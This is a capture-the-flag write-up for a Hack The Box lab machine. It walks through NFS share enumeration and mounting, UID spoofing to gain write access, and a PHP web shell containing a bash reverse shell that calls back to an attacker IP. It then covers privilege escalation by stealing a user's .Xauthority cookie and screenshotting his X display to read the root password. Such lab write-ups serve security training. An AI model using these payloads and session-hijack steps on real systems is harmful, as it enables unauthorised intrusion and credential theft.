This is a quiet interesting machine that is actually realistic. I personally learnt something new while solving this machine. ### Enumeration  We have got the NFS port open, you can follow up on [hacktricks](https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting) and get the cheatsheet. So I now use `showmount` to show all mounted folders.  We have `/home/ross` and `/var/www/html`. Now I mount the folders with the commands: ``` sudo mkdir /mnt/ross_folder && sudo mkdir /mnt/web_folder mount -t nfs 10.10.11.191:/home/ross /mnt/ross_folder -o nolock mount -t nfs 10.10.11.191:/var/www/html /mnt/web_folder -o nolock ```  Now let's have one last look at the nfs permissions upon the folders so that we can understand our way out of this. And we do this using nmap with the commands: ``` sudo nmap 10.10.11.191 --script nfs-ls ``` Or Instead of using nmap you have an alternative using metasploit with the module `scanner/nfs/nfsmount`  From the image above we can tell that we have read and write permission on `/var/www/html`. We can use this to our advantage and get initial access on the target's machine. ### Initial Foothold To be able to read and write in `/var/www/html` we need to be a user with the UID of 2017. In this case we create a user in our own machine and give the user that UID. ```bash! sudo useradd pewpew sudo usermod -u 2017 pewpew sudo groupmod -g 2017 su pewpew ```  I'll create a new file named `new.php` and i'll give it the malicious code that will be executed and provide a reverse shell once visited on the web ```php! <?php system("bash -c 'bash -i &>/dev/tcp/10.10.10.10/1337 <&1'");?> ``` I am going to set a listener on port 1337 and trigger the reverse shell by using curl on requesting the file.  Voila! I got user access.  The flag is found in `/home/alex/user.txt` ### PRIVILEGE ESCALATION  First trying to check for privileges of the user, and it asks for the password but unfortunately we do not know the password. Digging a bit more, I was able to see that the user `ross` is logged in:  And we do have access to Ross's home folder. While looking through his folder there is a Passwords.kdbx file which is a keepass database, thus tried cracking that but couldn't even convert it to john readable hash.   Taking a closer look at the files inside the home directory of Ross we can see that he has `.Xauthority` file.  Now you can read through this to get some basic information about what .Xauthority file does [xauthority-explained](https://www.systranbox.com/what-is-xauthority-file-linux/), Basically the file stores the user's session once logged in. In this case we can try replacing Alex's session with Ross's session which allows us to have access. Now to achieve this we first create a user with the UID 1001. Thus allows us to be able to read the files. ```bash! sudo useradd test sudo usermod -u 1001 sudo groupmod -g 1001 su test ``` Then we run the following ```bash! cat /mnt/ross_folder/.Xauthority | base64 > /tmp/xauth cd /tmp && python3 -m http.server ``` This should copy the file to `/tmp` and then start a HTTP server where you can download from the target.  Then I'll use the command `XAUTHORITY=/tmp/xauth` to set it as my session. I now use xwd to take a screenshot of the display of the user Ross using the commands: ```bash! xwd -root -screen -silent -display :0 > ~/out.xwd ``` the `:0` is replaced with the `FROM` column value where in our case it's `:0`, after taking the screenshot I shall use python to host a HTTP server again from `/home/alex` or move the image to `/var/www/html/` so as I can be able to access it and view it.  From here we get the password for root user which we can use to login as root to the target  ROOTED! PEWPEW 🙃 GREAT WORK TO [polarbear](https://app.hackthebox.com/users/159204) & [C4rm3l0](https://app.hackthebox.com/users/458049) ---